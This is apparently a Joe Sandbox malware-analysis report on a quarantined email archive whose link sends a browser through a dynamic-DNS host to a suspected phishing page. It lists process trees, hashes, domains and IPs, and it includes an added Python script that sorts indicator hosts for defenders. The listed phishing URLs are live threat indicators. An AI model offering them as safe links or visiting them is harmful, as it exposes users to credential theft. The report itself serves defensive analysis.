

Windows Analysis Report
Quarantined Messages(9).zip

Overview

General Information

Sample name: Quarantined Messages(9).zip
Analysis ID: 1524377
MD5: d0b2e490900517e47d99b92fadd6782f
SHA1: ef7b644648092578a3890c1f945ed043d22e61f3
SHA256: a84ad5387dd4803a60f346fc190ee587fe4da91c90df0f70f8e2ae83a51b1242
Infos:

Detection

Score: 2
Range: 0 - 100
Whitelisted: false
Confidence: 60%

Signatures

HTML page contains hidden javascript code
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • rundll32.exe (PID: 2744 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • OUTLOOK.EXE (PID: 6532 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Temp\Temp1_Quarantined Messages(9).zip\c2a65c0a-d2ae-4eac-21cd-08dce2de9da7\ef3049e0-344c-9ead-ea49-53e550940a43.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 4140 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "FB8C3304-C225-4C3E-9B5B-BC73B3822722" "A7F15C04-6E31-4F48-90D8-87131E5D097B" "6532" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 6676 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://maoe.is-a-player.com/ MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • chrome.exe (PID: 3964 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1936,i,13356850358512155363,12056628027222915284,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No yara matches
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6532, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
No Suricata rule has matched



There are no malicious signatures.

Source: https://clientportal65265.org/salimre/agg.php | HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....
Source: https://clientportal65265.org/salimre/agg.php | HTTP Parser: No favicon
Source: unknown | HTTPS traffic detected: 2.23.209.189:443 -> 192.168.2.18:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.18:49714 version: TLS 1.2
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.209.189
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: maoe.is-a-player.com | Connection: keep-alive | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9
Source: global traffic | DNS traffic detected: DNS query: maoe.is-a-player.com
Source: global traffic | DNS traffic detected: DNS query: clientportal65265.org
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic | DNS traffic detected: DNS query: challenges.cloudflare.com
Source: classification engine | Classification label: clean2.winZIP@23/18@20/137
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | File created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | File created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241002T1159070764-6532.etl
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Temp\Temp1_Quarantined Messages(9).zip\c2a65c0a-d2ae-4eac-21cd-08dce2de9da7\ef3049e0-344c-9ead-ea49-53e550940a43.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "FB8C3304-C225-4C3E-9B5B-BC73B3822722" "A7F15C04-6E31-4F48-90D8-87131E5D097B" "6532" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://maoe.is-a-player.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1936,i,13356850358512155363,12056628027222915284,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: c2r64.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Window found: window name: SysTabControl32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK matrix (reconstructed from the flattened grid: each tactic lists the four techniques shown in its column; a leading number is the count of matched signatures, techniques without a number are unmatched placeholder cells)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts
Execution: Windows Management Instrumentation, Scheduled Task/Job, At, Cron
Persistence: 1 DLL Side-Loading, 1 Registry Run Keys / Startup Folder, Logon Script (Windows), Login Hook
Privilege Escalation: 1 Process Injection, 1 DLL Side-Loading, 1 Registry Run Keys / Startup Folder, Login Hook
Defense Evasion: 1 Masquerading, 1 Rundll32, 1 Process Injection, 1 DLL Side-Loading
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS
Discovery: 1 Process Discovery, 14 System Information Discovery, Query Registry, System Network Configuration Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture
Command and Control: 2 Encrypted Channel, 2 Non-Application Layer Protocol, 3 Application Layer Protocol, 1 Ingress Tool Transfer
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction

No Antivirus matches (reported for each of the five antivirus-scan sections of the report)
Domains (Antivirus Detection column is empty for every row, shown as "-")

Name                       IP               Active  Malicious  Antivirus Detection  Reputation
a.nel.cloudflare.com       35.190.80.1      true    false      -                    unknown
clientportal65265.org      172.67.148.116   true    false      -                    unknown
maoe.is-a-player.com       132.226.118.109  true    false      -                    unknown
challenges.cloudflare.com  104.18.95.41     true    false      -                    unknown
www.google.com             142.250.184.196  true    false      -                    unknown

URLs

Name                                            Malicious  Antivirus Detection  Reputation
https://clientportal65265.org/salimre/agg.php   false      -                    unknown
http://maoe.is-a-player.com/                    false      -                    unknown
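The domain and URL tables above mark every entry as "Malicious: false" with "Reputation: unknown", which is absence of evidence rather than a clean verdict. What a responder actually needs from them is the short list of hosts the sample itself reached (the redirect chain maoe.is-a-player.com to clientportal65265.org/salimre/agg.php), separated from the Cloudflare and Google hosts the analysis VM's browser contacts on its own. The following is an added example, not part of the Joe Sandbox report: DOMAIN_ROWS and URL_ROWS are transcribed from the tables above; INFRA_SUFFIXES, DYNDNS_PARENTS and the naming heuristic are this example's own assumptions, not report data.

```python
"""Separate the network indicators worth hunting from sandbox infrastructure noise.

Added example; not part of the Joe Sandbox report. DOMAIN_ROWS and URL_ROWS are
transcribed from the report's domain and URL tables. INFRA_SUFFIXES and
DYNDNS_PARENTS are assumptions made for this example, not report data.
"""
import re
from urllib.parse import urlsplit

# Transcribed from the report: (name, resolved IP, active, flagged malicious).
DOMAIN_ROWS = [
    ("a.nel.cloudflare.com", "35.190.80.1", True, False),
    ("clientportal65265.org", "172.67.148.116", True, False),
    ("maoe.is-a-player.com", "132.226.118.109", True, False),
    ("challenges.cloudflare.com", "104.18.95.41", True, False),
    ("www.google.com", "142.250.184.196", True, False),
]
URL_ROWS = [
    "https://clientportal65265.org/salimre/agg.php",
    "http://maoe.is-a-player.com/",
]

# Assumption: hosts reached by the analysis VM's own browser and by CDN
# bot-management / error reporting (NEL, challenge pages), not by the sample.
INFRA_SUFFIXES = ("cloudflare.com", "google.com")
# Assumption: free dynamic-DNS parents under which attackers register hostnames.
DYNDNS_PARENTS = {"is-a-player.com"}


def registered_domain(name):
    """Naive eTLD+1 (last two labels); sufficient for the .com/.org names here."""
    return ".".join(name.lower().split(".")[-2:])


def classify(name):
    """Return a list of reasons to look at a host; ['infrastructure'] means skip."""
    if any(name == s or name.endswith("." + s) for s in INFRA_SUFFIXES):
        return ["infrastructure"]
    reasons = []
    parent = registered_domain(name)
    if parent in DYNDNS_PARENTS:
        reasons.append("dynamic-DNS host under " + parent)
    # Heuristic: a word followed by a run of digits (clientportal65265) is
    # typical of disposable phishing domains registered in bulk.
    if re.search(r"[a-z]\d{3,}$", parent.split(".")[0]):
        reasons.append("word+digits registered domain (disposable naming)")
    return reasons or ["uncategorised"]


def pivot_hosts(rows=DOMAIN_ROWS):
    """Hosts to hunt for, each with the report URLs that point at it."""
    result = {}
    for name, ip, active, malicious in rows:
        reasons = classify(name)
        if reasons == ["infrastructure"]:
            continue
        urls = [u for u in URL_ROWS if urlsplit(u).hostname == name]
        # The sandbox's 'Malicious' flag is recorded but never used as a filter:
        # 'false' plus 'Reputation: unknown' is absence of evidence.
        result[name] = {"ip": ip, "reasons": reasons, "urls": urls,
                        "sandbox_flagged": malicious}
    return result


if __name__ == "__main__":
    for host, info in pivot_hosts().items():
        print(host, info["ip"], "; ".join(info["reasons"]), info["urls"])
```

Run on the rows from this report, the function keeps exactly two hosts, maoe.is-a-player.com (dynamic DNS) and clientportal65265.org (word+digits name), each paired with its URL; the three Cloudflare/Google hosts drop out as infrastructure. The allow-list is deliberately short so that a Cloudflare-fronted phishing host such as clientportal65265.org (which resolves to a CLOUDFLARENET IP, see the IP table below) is judged by its name, not by the CDN in front of it.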
Contacted IPs (the Flag image column of the original table is omitted)

IP               Domain                     Country         ASN      ASN Name                       Malicious
52.113.194.132   unknown                    United States   8068     MICROSOFT-CORP-MSN-AS-BLOCKUS  false
142.250.184.196  www.google.com             United States   15169    GOOGLEUS                       false
1.1.1.1          unknown                    Australia       13335    CLOUDFLARENETUS                false
52.109.89.18     unknown                    United States   8075     MICROSOFT-CORP-MSN-AS-BLOCKUS  false
104.18.94.41     unknown                    United States   13335    CLOUDFLARENETUS                false
104.18.95.41     challenges.cloudflare.com  United States   13335    CLOUDFLARENETUS                false
142.251.168.84   unknown                    United States   15169    GOOGLEUS                       false
142.250.181.238  unknown                    United States   15169    GOOGLEUS                       false
239.255.255.250  unknown                    Reserved        unknown  unknown                        false
52.109.28.47     unknown                    United States   8075     MICROSOFT-CORP-MSN-AS-BLOCKUS  false
2.19.126.160     unknown                    European Union  16625    AKAMAI-ASUS                    false
172.67.148.116   clientportal65265.org      United States   13335    CLOUDFLARENETUS                false
142.250.186.164  unknown                    United States   15169    GOOGLEUS                       false
35.190.80.1      a.nel.cloudflare.com       United States   15169    GOOGLEUS                       false
132.226.118.109  maoe.is-a-player.com       United States   16989    UTMEMUS                        false
172.217.16.195   unknown                    United States   15169    GOOGLEUS                       false
20.50.201.205    unknown                    United States   8075     MICROSOFT-CORP-MSN-AS-BLOCKUS  false
Private IP
192.168.2.18 (RFC 1918 address)
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1524377
                Start date and time:2024-10-02 17:57:13 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:17
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • EGA enabled
                Analysis Mode:stream
                Analysis stop reason:Timeout
                Sample name:Quarantined Messages(9).zip
                Detection:CLEAN
                Classification:clean2.winZIP@23/18@20/137
                Cookbook Comments:
                • Found application associated with file extension: .zip
                • Exclude process from analysis (whitelisted): dllhost.exe
                • Excluded IPs from analysis (whitelisted): 20.242.39.171
                • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • VT rate limit hit for: Quarantined Messages(9).zip
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                File Type:data
                Category:dropped
                Size (bytes):231348
                Entropy (8bit):4.386628794825291
                Encrypted:false
                SSDEEP:
                MD5:FBAABFC276A093B71106EC6E2EF02B28
                SHA1:E580852F2E00C752855130885A8C57B14B27922A
                SHA-256:FE24C72214DFD3107768C2DEBB9AE59F8F8C782E2CA74ACDABB78EF89E206B6C
                SHA-512:35D28CEABE8A0DE945374907A3ACE3C9A1EF950A54C8DA65BF75C99213F78E899C4B50C451135A4DDE194D524F09EC6CA5C9DA8A65CC31305A860F5FB879657E
                Malicious:false
                Reputation:unknown
                Preview:TH02...... ..v..........SM01X...,...................IPM.Activity...........h...............h............H..h|........!.....h.........p..H..h\nor ...ppDa...hhz..0.........h.9............h........_`9k...h.8.@...I..w...h....H...8.>k...0....T...............d.........2h...............k..............!h.............. h/k..........#h....8.........$h.p......8....."h.n.......l....'h..............1h.9.<.........0h....4....>k../h....h.....>kH..hhs..p...|.....-h .............+h.:.....p................... ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.GwwMicrosoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):177088
                Entropy (8bit):5.286750267334744
                Encrypted:false
                SSDEEP:
                MD5:289730214FE14B41329CFF67F408F28C
                SHA1:2539F2C20072152ED92724F7592D8C414C1C1713
                SHA-256:2CABDACDF1431ECCE1A4C341D3A0D58862F8446B825645DCB5E9C06A75438321
                SHA-512:C89ED8D4E12DA6AA12E796FEAD57CA4D91289E86F4A341BAD8C3F6FA4E5DFAE8963A1ACEAE846AE8069EBB53A0A790B7D044CC2A3F5AEFDCA8FEF2D057868032
                Malicious:false
                Reputation:unknown
                Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-10-02T15:59:09">.. Build: 16.0.18112.40129-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                File Type:SQLite Rollback Journal
                Category:dropped
                Size (bytes):4616
                Entropy (8bit):0.1384465837476566
                Encrypted:false
                SSDEEP:
                MD5:6EBCC22A106424F7FAE353658A980AD7
                SHA1:BA80DD5BC11C804C9DEEB4A9EEA37704BD329F43
                SHA-256:EFE0648B5E8D757E1E6FF456542DC38B8BA2901D9F8FD45A3DD0BF86FFB66534
                SHA-512:D6E799308C53DF068A9FD46319CA60FA407EB00E7A91E5FE48EBF940121C34A32E4E31137D4256F6D83036DAC660BA3C20A9E771C1A9361BE95502EEA42F188E
                Malicious:false
                Reputation:unknown
                Preview:.... .c.......V....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................K.................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                File Type:data
                Category:dropped
                Size (bytes):30
                Entropy (8bit):1.2389205950315936
                Encrypted:false
                SSDEEP:
                MD5:6260499B0375B441FE1991C4243DDFAB
                SHA1:DC8B2ED2286F5D5CB32CB9930F187599AD83DAD7
                SHA-256:E6092E2911E0F3CAF0FE442F2D06258FF5A7068BDADDB31AE68EAEAB66A5168B
                SHA-512:2AA429FDA76B2994B9D49CEEC13DE822A49CE84FAE046832A8321D5B307DC98F718FAECF237F94D9DE1194DB899887A79F12B27B0006E370C3177CE23BEAB2AD
                Malicious:false
                Reputation:unknown
                Preview:.....L........................
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 14:59:23 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2677
                Entropy (8bit):3.9910010306703807
                Encrypted:false
                SSDEEP:
                MD5:9C5CF584DCDC12997242BB29D8B01ACE
                SHA1:97D5937D28BCEE01AFAEF9F4F334405FEF966E01
                SHA-256:3E0DF307FDCF0BB8EEA4F10F241AD72BE40429D09D13776CEB5FDA84260CEFF6
                SHA-512:25766E8EA98A5FF8FDEDF6C3235226B9D9ED9D6691D9BAA8C2CE97213EC2FD8D969D98560EDF79F2E38C5F0602307D922E14CE68598F8ECA8A644FDADD23B5D6
                Malicious:false
                Reputation:unknown
